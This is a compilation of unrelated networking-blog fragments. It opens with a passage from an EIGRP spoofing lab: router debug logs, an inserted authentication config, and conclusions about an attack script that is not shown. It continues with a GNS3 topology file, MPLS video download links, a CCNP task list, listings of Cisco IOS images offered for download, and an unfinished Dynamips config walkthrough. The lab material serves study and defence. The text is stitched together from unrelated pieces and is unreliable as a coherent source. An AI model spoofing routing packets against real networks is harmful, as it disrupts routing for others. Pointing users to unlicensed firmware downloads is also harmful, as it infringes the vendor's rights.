R3 sends a standard goodbye packet with all K values set to 255.
Observe the other two routers:
R0
Feb 1 08:56:22.286: IP: s=192.168.1.248 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 08:56:22.294: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.248
Feb 1 08:56:22.298: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:56:22.298: Inteface goodbye received
Feb 1 08:56:22.298: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.248 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 08:56:22.298: DUAL: linkdown: start - 192.168.1.248 via FastEthernet0/0
Feb 1 08:56:22.298: DUAL: Destination 192.168.0.0/16
Feb 1 08:56:22.302: DUAL: Destination 172.16.0.0/16
Feb 1 08:56:22.306: DUAL: linkdown: finish
R1
Feb 1 08:56:22.233: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.248
Feb 1 08:56:22.237: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:56:22.241: Inteface goodbye received
Feb 1 08:56:22.241: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.248 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 08:56:22.245: DUAL: linkdown: start - 192.168.1.248 via FastEthernet0/0
Feb 1 08:56:22.253: DUAL: Destination 192.168.0.0/16
Feb 1 08:56:22.257: DUAL: Destination 172.16.0.0/16
Feb 1 08:56:22.261: DUAL: Destination 172.16.0.0/24
Feb 1 08:56:22.265: DUAL: linkdown: finish
Both routers received .248's goodbye almost simultaneously and therefore tore down the adjacency. This sequence matches our understanding of EIGRP.
2. 192.168.1.249 joins the network. This simulates whether a .249 with a different MAC address appearing on the segment, as in attack method one, triggers a goodbye.
We change the address directly on R3's f0/0 interface:
ip address 192.168.1.249 255.255.0.0
(1) R3's interface address changes, EIGRP recalculates, and R3 sends a goodbye:
R3
.Feb 2 00:18:02.474: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
.Feb 2 00:18:02.478: EIGRP: Sending HELLO . FastEthernet0/0
.Feb 2 00:18:02.482: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
(The command took effect: R3 now treats .249 as its own local address and multicasts from it.)
Judging by the MAC address, this packet is R3 sending its goodbye.
(2) R0's route to 172.16 via R1 loses its target (the real .249 has been displaced by the fake one) and R0 sends a query:
R3 receives the query and sends a goodbye again:
R3
.Feb 2 00:18:02.510: DUAL: rcvupdate: 192.168.0.0/16 via Connected metric 4294967295/4294967295
.Feb 2 00:18:02.514: DUAL: Find FS for dest 192.168.0.0/16. FD is 281600, RD is 281600
.Feb 2 00:18:02.518: DUAL: 0.0.0.0 metric 4294967295/4294967295 not found Dmin is 4294967295
.Feb 2 00:18:02.518: DUAL: Peer total 2 stub 0 template 0
.Feb 2 00:18:02.522: DUAL: Dest 192.168.0.0/16 (No peers) not entering active state.
.Feb 2 00:18:02.526: DUAL: Removing dest 192.168.0.0/16, nexthop 0.0.0.0, infosource 0.0.0.0
.Feb 2 00:18:02.530: DUAL: No routes. Flushing dest 192.168.0.0/16
.Feb 2 00:18:02.534: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
.Feb 2 00:18:02.538: EIGRP: Sending HELLO . FastEthernet0/0
(3) R0 finally catches on and also starts the down procedure:
R0
Feb 2 00:18:02.534: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.542: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.546: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 2 00:18:02.550: Inteface goodbye received
Feb 2 00:18:02.550: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Interface Goodbye received
Feb 2 00:18:02.554: DUAL: linkdown: start - 192.168.1.249 via FastEthernet0/0
Feb 2 00:18:02.562: DUAL: Destination 192.168.0.0/16
Feb 2 00:18:02.566: DUAL: Destination 172.16.0.0/16
Feb 2 00:18:02.570: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 2 00:18:02.574: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 2 00:18:02.574: DUAL: Peer total 1 stub 0 template 1
Feb 2 00:18:02.578: DUAL: Dest 172.16.0.0/16 entering active state.
Feb 2 00:18:02.582: DUAL: Set reply-status table. Count is 1.
Feb 2 00:18:02.582: DUAL: Not doing split horizon
Feb 2 00:18:02.586: DUAL: linkdown: finish
(4) Meanwhile R1 receives both the fake .249's packets and R0's query; it keeps ignoring the former and answering the latter with updates:
R1
Feb 2 00:18:02.595: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.599: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.599: EIGRP: Packet from ourselves ignored
Feb 2 00:18:02.667: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 67, rcvd 2
Feb 2 00:18:02.671: EIGRP: Received QUERY . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.671: AS 1, Flags 0x0, Seq 111/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 2 00:18:02.671: EIGRP: Enqueueing ACK . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.671: Ack seq 111 iidbQ un/rely 0/0 peerQ un/rely 1/0
Feb 2 00:18:02.671: IP-EIGRP(Default-IP-Routing-Table:1): Processing incoming QUERY packet
Feb 2 00:18:02.671: IP-EIGRP(Default-IP-Routing-Table:1): Int 172.16.0.0/16 M 4294967295 - 256000 4294967295 SM 4294967295 - 256000 4294967295
Feb 2 00:18:02.675: DUAL: dest(172.16.0.0/16) not active
Feb 2 00:18:02.675: DUAL: rcvquery: 172.16.0.0/16 via 192.168.1.251 metric 4294967295/4294967295, RD is 281600
Feb 2 00:18:02.679: DUAL: send REPLY(r1/n1) about 172.16.0.0/16 to 192.168.1.251
Feb 2 00:18:02.683: IP: s=192.168.1.249 (local), d=192.168.1.251 (FastEthernet0/0), len 40, sending
Feb 2 00:18:02.687: EIGRP: Sending ACK . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.691: AS 1, Flags 0x0, Seq 0/111 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 1/0
Feb 2 00:18:02.695: EIGRP: Enqueueing REPLY . FastEthernet0/0 nbr 192.168.1.251 iidbQ un/rely 0/1 peerQ un/rely 0/0 serno 7-7
Feb 2 00:18:02.699: EIGRP: Requeued unicast . FastEthernet0/0
Feb 2 00:18:02.703: EIGRP: Forcing multicast xmit . FastEthernet0/0
Feb 2 00:18:02.703: IP-EIGRP(Default-IP-Routing-Table:1): 172.16.0.0/16 – do advertise out FastEthernet0/0
Feb 2 00:18:02.707: IP-EIGRP(Default-IP-Routing-Table:1): Int 172.16.0.0/16 metric 281600 - 256000 25600
Feb 2 00:18:02.707: IP: s=192.168.1.249 (local), d=192.168.1.251 (FastEthernet0/0), len 67, sending
Feb 2 00:18:02.707: EIGRP: Sending REPLY . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.707: AS 1, Flags 0x0, Seq 65/111 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 7-7
Feb 2 00:18:02.711: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.719: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.723: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.727: EIGRP: Packet from ourselves ignored
Feb 2 00:18:02.767: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.775: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.779: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.779: EIGRP: Packet from ourselves ignored
(5) The state of the three routers afterwards:
R0
Feb 2 00:55:37.910: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), len 40, rcvd 3
Feb 2 00:55:37.918: EIGRP: Received UPDATE . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:55:37.922: AS 1, Flags 0x1, Seq 72/136 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0, last received seq 72, out of sequence, this seq 72
R0 keeps receiving updates from the revived R3, but because the data from the real and the fake .249 is interleaved, R0 finds the sequence numbers wrong, keeps discarding the updates, and so keeps restarting its EIGRP state.
R1 and R3 keep sending hellos and updates, each trying to be the first to form an adjacency with R0.
As a result the routes in the network keep flapping, and the routers report overlapping IP addresses.
In short, modifying the topology does not reproduce the state seen during the attack: this time R0 clearly reports out-of-sequence packets rather than the "address dynamic" complaints.
7. Summary. This experiment was designed in several stages:
1. Malicious EIGRP route injection: no surprises, it went very smoothly.
2. The EIGRP hello DoS attack: we realized this is not a real DoS. When EIGRP receives a crafted packet whose source is an already adjacent neighbor and whose destination is not 224.0.0.10 but the address of the router's own EIGRP interface, the router itself sends a goodbye and reports an address change (dynamic/static).
3. The EIGRP ipgoodbye attack: we found that it does not use all-255 K values either; instead a piece of data of the attack script's own follows the normal Hello TLVs, and that likewise makes the attacked device recognize the packet as a goodbye.
4. Finally we modified the environment ourselves, simulating a device with the same address inserted into the network, and found the behaviour differs again: the new device interacts with the attacked router, which is confused by receiving data from two devices with the same address and stays in a discard state, while the real and the fake router keep trying to contact and update the peer.
Conclusions:
1. The attack script contains a lot of bluster: what it calls DoS is not DoS at all, and what it calls ipgoodbye is not the correct packet format. The other parameters have not been tested one by one, since they are unrelated to the attack.
2. There is a lot in the EIGRP algorithm that deserves deeper study; our understanding is still shallow, and in particular no consensus was reached in this experiment on exactly when a goodbye is triggered.
3. The phenomena in this experiment are all fairly easy for an attacker to simulate, which shows that EIGRP is prone to route flapping in certain circumstances.
Recommendations:
1. Match neighbor relationships strictly, lock down IP addresses, and plan the EIGRP layout of the network sensibly.
2. Enable authentication. Do not shy away from the hassle; security is a matter of awareness. Especially now that LAN speeds are rising fast, a bit of cryptographic processing will not burden the network or the devices much.
3. Strengthen management and keep an eye on the traffic in the network.
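Recommendations 1 and 2 as an added configuration example for R0 in this lab (AS 1, FastEthernet0/0, neighbor R1 at 192.168.1.249); this is not from the original post. The key-chain name and key string are placeholders, and the same authentication and static-neighbor configuration has to be applied on R1, otherwise the adjacency drops as soon as one side is changed.

```cisco
! Weak: the lab's configuration. Any host on the segment can become a
! neighbor, or spoof one, by sending hellos to 224.0.0.10.
router eigrp 1
 network 192.168.0.0
!
! Hardened
key chain EIGRP-KEYS
 key 1
  key-string REPLACE-ME           ! shared secret, identical on every neighbor
!
interface FastEthernet0/0
 ip authentication mode eigrp 1 md5
 ip authentication key-chain eigrp 1 EIGRP-KEYS
!
router eigrp 1
 network 192.168.0.0
 passive-interface default         ! no hellos on segments without neighbors
 no passive-interface FastEthernet0/0
 ! Static neighbor: hellos to this peer are unicast, and IOS stops sending
 ! and processing multicast hellos on the interface.
 neighbor 192.168.1.249 FastEthernet0/0
```

With the static neighbor statement in place, a crafted hello or goodbye multicast to 224.0.0.10 is no longer consumed on that interface, and with MD5 authentication a packet that lacks a valid keyed digest is discarded before DUAL ever sees it, which covers both the hello DoS and the ipgoodbye cases above. Check the result with show ip eigrp neighbors and show ip eigrp interfaces detail (the latter reports the authentication mode). The caveat is that this does not protect against a peer that holds the key, so the key still has to be kept off shared documentation and rotated with key-chain lifetimes.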
autostart = False
[localhost:7202]
workingdir = E:\Dynamips\bsci_working
udp = 10200
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0x605c95b4
ghostios = True
chassis = 3640
[[ROUTER P2R4]]
model = 3640
console = 2015
slot0 = NM-4T
s0/0 = P2R3 s0/0
slot1 = NM-1FE-TX
f1/0 = P2R2 f1/0
x = 272.0
y = 203.0
hx = -2.0
hy = -20.0
[[ROUTER P2R3]]
model = 3640
console = 2019
slot0 = NM-4T
s0/0 = P2R4 s0/0
slot1 = NM-1FE-TX
f1/0 = P2R1 f1/0
x = 83.0
y = 207.0
[[ROUTER P2R1]]
model = 3640
console = 2020
slot0 = NM-4T
s0/0 = FR s1/2
s0/1 = P2R2 s0/1
slot1 = NM-1FE-TX
f1/0 = P2R3 f1/0
x = 87.0
y = 70.0
[[ROUTER P2R2]]
model = 3640
console = 2021
slot0 = NM-4T
s0/0 = FR s1/3
s0/1 = P2R1 s0/1
slot1 = NM-1FE-TX
f1/0 = P2R4 f1/0
x = 266.0
y = 70.0
[localhost:7200]
workingdir = E:\Dynamips\bsci_working
udp = 10000
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0x605c95b4
ghostios = True
chassis = 3640
[[ROUTER R4]]
model = 3640
console = 2013
slot0 = NM-1FE-TX
f0/0 = SW0 3
x = -4.0
y = -121.0
hx = 40.0
hy = -21.0
[[ROUTER FR]]
model = 3640
console = 2017
slot0 = NM-4T
s0/0 = BBR2 s0/0
s0/1 = BBR1 s0/0
slot1 = NM-4T
s1/0 = P1R1 s0/0
s1/1 = P1R2 s0/0
s1/2 = P2R1 s0/0
s1/3 = P2R2 s0/0
symbol = Frame_Relay(ROUTE)
x = 6.5
y = -49.5
[[ROUTER BBR2]]
model = 3640
console = 2024
slot0 = NM-4T
s0/0 = FR s0/0
slot1 = NM-1FE-TX
f1/0 = SW0 1
x = -252.0
y = -202.0
[[ETHSW SW0]]
1 = access 1
2 = access 1
3 = access 1
x = -6.5
y = -195.0
[[ROUTER BBR1]]
model = 3640
console = 2014
slot0 = NM-4T
s0/0 = FR s0/1
slot1 = NM-1FE-TX
f1/0 = SW0 2
x = 201.0
y = -201.0
[localhost:7201]
workingdir = E:\Dynamips\bsci_working
udp = 10100
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0x605c95b4
ghostios = True
chassis = 3640
[[ROUTER P1R3]]
model = 3640
console = 2023
slot0 = NM-4T
s0/0 = P1R4 s0/0
slot1 = NM-1FE-TX
f1/0 = P1R1 f1/0
x = -282.0
y = 208.0
hx = -7.0
hy = -24.0
[[ROUTER P1R2]]
model = 3640
console = 2022
slot0 = NM-4T
s0/0 = FR s1/1
s0/1 = P1R1 s0/1
slot1 = NM-1FE-TX
f1/0 = P1R4 f1/0
x = -123.0
y = 68.0
[[ROUTER P1R4]]
model = 3640
console = 2018
slot0 = NM-4T
s0/0 = P1R3 s0/0
slot1 = NM-1FE-TX
f1/0 = P1R2 f1/0
x = -119.0
y = 207.0
[[ROUTER P1R1]]
model = 3640
console = 2016
slot0 = NM-4T
s0/0 = FR s1/0
s0/1 = P1R2 s0/1
slot1 = NM-1FE-TX
f1/0 = P1R3 f1/0
x = -278.0
y = 65.0
[GNS3-DATA]
workdir = bsci_working
[[Cloud TFTP]]
symbol = computer
x = -5.5
y = -296.5
mpls-00-mpls-basic-143min.wmv
http://d.namipan.com/d/82d4ce62e6446179d3eab631166790ac033cfec5cc1b4909
mpls-01-mpls-basic-label-protocol-81min.wmv
http://d.namipan.com/d/ea2084311d6493b6e0a375d7eac98dd6440467ccb8fd1c05
mpls-02-mpls-advanced-feature-124min.wmv
http://d.namipan.com/d/2a5b923d7ea4f9ed2c9de3fdf65bc2c35807c382e0b33c06
mpls-03-mpls-summary-and-vpn-introduction-136min.wmv
http://d.namipan.com/d/e82ead13f331d2fda7a0f46d643edb541659d502eec9f706
mpls-04-mpls-vpn-deployment-pe-ce-protocol-154min.wmv
http://d.namipan.com/d/14138e252336e2b1ad1fcbf93ea0b99b2dd696382eeaa608
mpls-05-mpls-vpn-deployment-topology-42min.wmv
http://d.namipan.com/d/bb7a5a5466b56d87f9e0c81ff0b27a9aebd77b497020d002
mpls-06-mpls-vpn-internet-access-98min.wmv
http://d.namipan.com/d/67cbfe26c1ab98cb3f23bd2e6901e4858e9366dc16130304
mpls-07-mpls-vpn-internet-access-58min.wmv
http://d.namipan.com/d/c00b5d581d39e59807a06bb4e76d945f379add6ae816dc02
mpls-08-mpls-vpn-inter-as-105min.wmv
http://d.namipan.com/d/a4eea6f8545388a892ce57f3d8b55251127382a5349d8705
mpls-09-mpls-vpn-inter-as-69min.wmv
http://d.namipan.com/d/d83636dcc8c824a244ee34564f7c77375ec980720e741b03
mpls-10-mpls-vpn-inter-as-64min.wmv
http://d.namipan.com/d/54234d84e8215a777a24986ee899430ea4470ec9e0fcb303
mpls-11-mpls-vpn-csc-59min.wmv
http://d.namipan.com/d/ca02949d9e3c9ec40e3566b4387f67d62b575e23e8a94b04
mpls-12-npls-vpn-csc-144min.wmv
http://d.namipan.com/d/e4ec9c374c1156d1a12b102bfd9523b76cd82bd21858b908
mpls-13-mpls-te-theory-175min.wmv
http://d.namipan.com/d/4048488a9b49a29c3c296917e4a7051c6ddb68edbc76ae07
mpls-14-mpls-te-configuration-117min.wmv
http://d.namipan.com/d/cc888488c87cb65e537640ebe2f25502d4aa2d691a67b205
mpls-15-mpls-te-optimization-107min.wmv
http://d.namipan.com/d/9a8c9c1ff7c19bbc7333b7e2348ebd68232d761264d16206
mpls-16-mpls-te-frr-qos-vpn-130min.wmv
http://d.namipan.com/d/4c1b5f014195a75b348945cd393a603d1db34e6192843106
mpls-17-multicast-vpn-1-164min.wmv
http://d.namipan.com/d/f6821a2091a5b0cff5005c9a30e124088b0c541eb0ba3a07
mpls-18-multicast-vpn-2-71min.wmv
http://d.namipan.com/d/0029dca825d4b07cc7110055437eb5bfad0e6f3d04a92303

————————————————————————————————————————————–
Instructions
Configure the routers according to the above diagram and the requirements below.
Requirements
• Configure the interfaces with the IP addresses shown in the diagram.
• Configure R2 and R3 to be in EIGRP AS 65100. Add the entire class B network and disable automatic summarization.
• Configure OSPF area 0 on the link between R1 and R2. Also add the loopback interfaces on R1 into area 0.
• Have R3 redistribute its connected routes into EIGRP.
• Make sure all loopback interfaces are advertised with the correct mask.
• Have R2 originate a default route into the OSPF domain.
• Redistribute OSPF into EIGRP.
• Filter out 172.16.120.0 and 172.16.121.0 from being advertised to R3.
• Configure R2 and R3 in BGP AS 65100. Configure R4 in BGP AS 65400.
• Peer R2 and R3 in BGP on their loopback interfaces.
• Peer R3 and R4 in BGP.
• Have R4 advertise its loopback interfaces into BGP.
• Configure R3 to filter out 172.31.8.0 and 172.31.12.0 on the inbound updates from R4.
• Configure R4 with a static route to the 172.16.0.0/16 network via R3.
CCNP: Building Scalable Internetworks v5.0 - Skills-Based Assessment 2, Copyright © 2006, Cisco Systems, Inc
The IOS images come from the Internet and the copyright belongs to Cisco. Do not use them commercially; you bear the consequences if you do!!!
Google sites地址:http://google.ghitr.com/cisco/jing-pin-si-keios-quan-tao-xia-zai7-8g
│ │ │ c1600-sy-l_112-17_P.bin 4.02 MB
│ │ │ c1700-bk9no3r2sy7-mz.123-7.XR.bin 13.43 MB
│ │ │ c1700-ipvoice-mz.123-12.bin 11.88 MB
│ │ │ c1700-k9o3sy7-mz.123-10.bin 9.32 MB
│ │ │ c1700-k9o3sy7-mz.123-11.t.bin 12.64 MB
│ │ │ c1700-k9o3sy7-mz.123-7.T.bin 11.18 MB
│ │ │ c1700-sv3y-mz.122-4.YB.bin 7.53 MB
│ │ │ c1700-sy7-mz.123-9.bin 7.93 MB
│ │ │ c1700-y-mz.123-12.bin 5.61 MB
│ │ │ c2500-c-l.122-13.T.bin 9.44 MB
│ │ │ c2500-i-l.121-2.T.bin 7.62 MB
│ │ │ c2500-is-l.122-8.T.bin 13.22 MB
│ │ │ c2500-jos56i-l.121-18.bin 15.61 MB
│ │ │ c2600-i-mz.122-8.T5.bin 5.58 MB
│ │ │ c2600-is-mz.122-2.XT.bin 12.14 MB
│ │ │ c2600-jk9s-mz.122-12a.bin 12.07 MB
│ │ │ c2600-js-mz_121-5_T.bin 10.89 MB
│ │ │ c2600-jsx-mz.122-8.T.bin 7.06 MB
│ │ │ c2600-p-mz.991126 6.42 MB
│ │ │ c2950-i6q4l2-mz.121-6.EA2c.bin 2.15 MB
│ │ │ c3500xl-c3h2s-tar.120-5.WC13.tar 2.80 MB
│ │ │ c3550-i5k2l2q3-tar.121-11.EA1.zip 5.31 MB
│ │ │ c3550-i5q3l2-tar.121-12c.EA1.zip 5.30 MB
│ │ │ c3550-i5q3l2-tar.121-8.EA1c.bin 4.88 MB
│ │ │ c3550-ipservicesk9-tar.122-25.SEC2.tar 8.19 MB
│ │ │ c3550-ipservicesk9-tar.122-25.SEE2.tar 8.62 MB
│ │ │ c3620-is-mz_121-5_T.bin 10.19 MB
│ │ │ c3640-i-mz.120-7.T.bin 4.49 MB
│ │ │ c3640-ik8s-mz.122-15.t11.bin 17.60 MB
│ │ │ c3640-ik9o3s-mz.122-8.T10.bin 14.76 MB
│ │ │ c3640-is-mz.120-7.T.bin 7.76 MB
│ │ │ c3640-is-mz.123-8.T_96_32_Plus.bin 21.31 MB
│ │ │ c3640-js-mz.122-8.T.bin 15.22 MB
│ │ │ C3640-Jsx-Mz 123-6.bin 17.82 MB
│ │ │ c3660-jo3s56i-mz.120-7.XK2.bin 10.79 MB
│ │ │ c3660.rar 13.34 MB
│ │ │ c3750-advipservicesk9-tar.122-25.SEE.tar 9.77 MB
│ │ │ c5300-i-mz.120-5.T1.bin 4.28 MB
│ │ │ c5300-is-mz.120-7.T.bin..bin 6.70 MB
│ │ │ c5300-jk9s-mz.122-2.XB3.bin 11.55 MB
│ │ │ c5350-jk8s-mz.122-11.T.bin 14.10 MB
│ │ │ c5350-js-mz.122-15.T1.bin 14.49 MB
│ │ │ c7200-is-mz.19991126 7.81 MB
│ │ │ c7200-js-mz.122-11.T.bin 15.71 MB
│ │ │ c7200-tipv6-mz.0519 3.04 MB
│ │ │ C800-K9osy6-Mw 123-3a.bin 1.63 MB
│ │ │ c800-k9osy6-mw.122-15.T12.bin 7.49 MB
│ │ │ Device_Manager.rar 10.19 MB
│ │ │ rsp-jsv-mz.122-12a.bin 16.43 MB
│ │ └─PIX (0 folders, 8 files, 14.63 MB, 14.63 MB in total.)
│ │ bh515.bin 270.00 KB
│ │ bh61.bin 216.00 KB
│ │ np63.bin 90.00 KB
│ │ np70.bin 126.00 KB
│ │ pix515.bin 1.63 MB
│ │ pix615.bin 2.48 MB
│ │ pix635.bin 2.00 MB
│ │ pix721.bin 7.82 MB
│ │ 。。。。。。
Series c1600
Series c1700
c1700-bk9no3r2sy7-mz.123-7.XR.bin
c1700-Advipservicesk9-Mz 123-7 T.bin
C1700-Advsecurityk9-Mz.123-15.bin
c1700-advsecurityk9-mz.123-9a.bin
c1700-bk9no3r2sv8y7-mz.123-4.XK2.bin
c1700-entbase-mz.123-14.T3.bin
c1700-ipvoice-mz.123-11.T5.bin
c1700-ipvoice-mz.123-7.XR3.bin
C1700-K9o3sv8y7-Mz 123-12a.bin
c1700-k9o3sv8y7-mz.123-11.T5.bin
c1700-k9o3sv8y7-mz.123-7.T6.bin
c1700-k9o3sy7-mz.123-9a1720.bin
c1700-spservicesk9-mz.123-11.T5.bin
c1700-spservicesk9-mz.123-15.bin
Series 1841
c1841-broadband-mz.123-11.T3.bin
Series 2500
Series 2600
c2600-io3s56i-mz_120-5_XK1.bin
C2600-Advsecurityk9-Mz.123-5a.bin
c2600-advsecurityk9-mz.123-12.bin
c2600-advipservicesk9-mz.123-4.T6.bin
Series c2900
c2900xl-c3h2s-tar.120-5.WC7.zip
Series c2950
c2950-i6q4l2-mz.121-6.EA2b.bin
c2950-i6q4l2-mz.121-6.EA2c.bin
c2950-i6q4l2-mz.121-9.EA1d.bin
c2950-i6q4l2-tar.121-12c.EA1.zip
c2950-i6q4l2-tar.121-9.EA1.zip
Series c3550
c3550-i5k2l2q3-tar.121-11.EA1.zip
c3550-i5q3l2-tar.121-12c.EA1.zip
c3550-i5q3l2-tar.121-8.EA1c.bin
Series c3600-2600
c3600-2600-analog-fw.1.2.2.bin
Series c3620
Series 3631
c3631-telcoent-mz.123-2.T1.bin
Series c3640
c3640-is-mz.123-8.T_96_32_Plus.bin
Series c3660
c3660-jo3s56i-mz.120-7.XK1.bin
c3660-jo3s56i-mz.120-7.XK2.bin
Series 3725
Series c5300
Series c5350
Series c7200
c7200-is-mz.123-1a.bin
c7200-is-mz.123-14.T1.bin
Series PIX 634
Google sites: http://google.ghitr.com/cisco/dynamips-zhongnet-wen-jian-xiang-jie-
Dynamips comes in several versions, but as it stands it is a router emulator; the switching part is emulated by inserting different port modules into a router.
Usually we use a version between 0.2.5-RC1 and 0.2.7-RC1; the newest is 0.2.7-RC1.
Version 0.2.5 supports only three models, the 3640, 3660 and 7200, and can only emulate routers.
From 0.2.6-RC1 on, the author added support for the NM-16ESW switching module on the 3600 series, so four devices are supported (3620, 3640, 3660 and 7200), and the problem of 100% host CPU usage under some configurations was fixed.
0.2.7-RC1 was developed only recently and fixes many bugs. On top of the previously supported devices it adds the 2600, the Cisco 7200 NPE-G2 and the new Cisco 7200 Ethernet Port Adapters.
It is run through the Dynagen program, which reads .net files. Dynagen apparently was not written by Chris but by someone else. The .net configuration file it uses is quite logical and better suited to building your own topologies, but its CPU and memory usage is high, and if one virtual device crashes, all running devices have to be restarted.
That was a brief overview of the Dynamips emulator; now let's look at its configuration, starting with the configuration file. Note: this needs to run under version 0.2.7-RC1.
Below we excerpt a section of a configuration file to see how it is configured.
The commentary lines are explanation; everything else is the file itself.
*****************************************************************************
autostart = false
# Whether to start automatically. If this is true, every device starts as soon as you run the program (a disaster if there are many devices). I recommend false; afterwards you start whichever device you need.
[localhost]
port = 7200
udp = 10000
# The above sets the port numbers used by all the virtual devices; it presumably defines a starting port and the rest are allocated automatically. I did not find the specific per-device ports, so this is only a guess.
[[router R1]]
# "router" in front defines the device type, which also shows that Dynamips really only emulates routers.
R1 after it is the device name you define; it must differ from the other devices.
image = D:\cisco IOS rom\IOS\c3640-jk9o3s-mz.124-10a.bin
# This is the path of the IOS file downloaded from the Internet; an absolute path is best.
model = 3640
# This line defines the router model. Use the model that matches the IOS; virtual devices of different models behave differently. This one is a 3640.
console = 2001
# This defines the login port, and the value must be unique in the whole configuration. 2001 is simply TCP port 2001. See [localhost] above? That is the address, which can also be written 127.0.0.1. So if you log in with telnet, the address is 127.0.0.1:2001. I will write separately about using SecureCRT.
ram = 96
# Defines how much memory this virtual device uses. Try it out: if the value is too small the device will not boot, and if you have plenty of memory you can raise it.
confreg = 0x2102
# The configuration register. I recommend setting it straight to 2102. Many people say the configuration cannot be saved, and that is because the register was set to 2142. It is not that the device cannot save; with 2142 the device does not read the configuration at boot.
idlepc = 0x603e0068
# This value affects performance; try several.
exec_area = 64
# It looks like space for commands or programs, but I have never been clear what this setting does.
mmap = true
# If you have plenty of memory, set this to false so the program runs entirely in memory. If, like me, you only have 512 MB, I recommend true. Note: with true you must leave some disk space free on the drive where the program lives; 1 GB or more is recommended.
slot0 = NM-1FE-TX #36-series 1-port Fast Ethernet module; connecting to a virtual switch requires this one.
slot1 = NM-4T # 36-series 4-port serial module.
slot2 = NM-1FE-TX #36-series 1-port Fast Ethernet module; this one is used to connect to other devices.
The three lines above show the modules (line cards) in the virtual device's slots. The 3640 supports 4 modules, the 3660 supports 6. The supported module types are covered later.
f0/0 = SW9 1 The local f0/0 is connected to port 1 of the device named SW9.
s1/1 = R2 s3/0 The local s1/1 is connected to port s3/0 of the device named R2.
s1/2 = FR1 1 The local s1/2 is connected to port 1 of the device named FR1.
f2/0 = SW1 f1/15 The local f2/0 is connected to port f1/15 of the device named SW1.
The four lines above show the topology connections: before the = is the local port, after it the peer device name and port. Format: local port = peer name peer port. Once a connection is defined here it must not be defined again on the peer device, or an error results.
[[router R2]]
As above; this device is called "R2".
image = D:\cisco IOS rom\IOS\c7200-jk9o3s-mz.124-10a.bin
This device uses a 7200 IOS; the 7200 and 3600 use different modules.
model = 7200
Defines the device as a 7200.
console = 2002
This device logs in on port 2002.
npe = npe-400
Defines the NPE type of the 7200. I do not yet know exactly what it does, but this value works fine.
ram = 128
The 7200 naturally wants more memory; I set 128 MB, and some people reportedly set 256 MB.
confreg = 0x2102
idlepc = 0x6074ae38
exec_area = 64
mmap = true
The lines above are the same as for the first device, general settings; they are not repeated below.
slot0 = PA-C7200-IO-FE The 7200's 1-port Fast Ethernet module; connecting to a virtual switch requires this one.
slot1 = PA-FE-TX The 7200's 1-port Fast Ethernet module; this port is used to connect to other devices.
slot2 = PA-A1 1-port ATM module supported only by the 7200; the 36 series does not support it.
slot3 = PA-4T The 7200's 4-port serial module.
See, the 36-series and 72-series modules differ; do not mix them up when building your own topology.
f0/0 = SW9 2 The local f0/0 is connected to port 2 of the device named SW9.
f1/0 = SW1 f1/14 The local f1/0 is connected to port f1/14 of the device named SW1.
s1/2 = FR1 2 The local s1/2 is connected to port 2 of the device named FR1.
a2/0 = AT1 1 The local ATM port a2/0 is connected to port 1 of the device named AT1.
The above is this device's topology connections. R1 and R2 share a serial link; since it was defined on R1 it need not be defined again here.
[[router SW1]]
This device is called SW1 because its main job is to emulate a switch, but the device type is still router.
image = D:\cisco IOS rom\IOS\c3640-telco-mz.123-11.T.bin
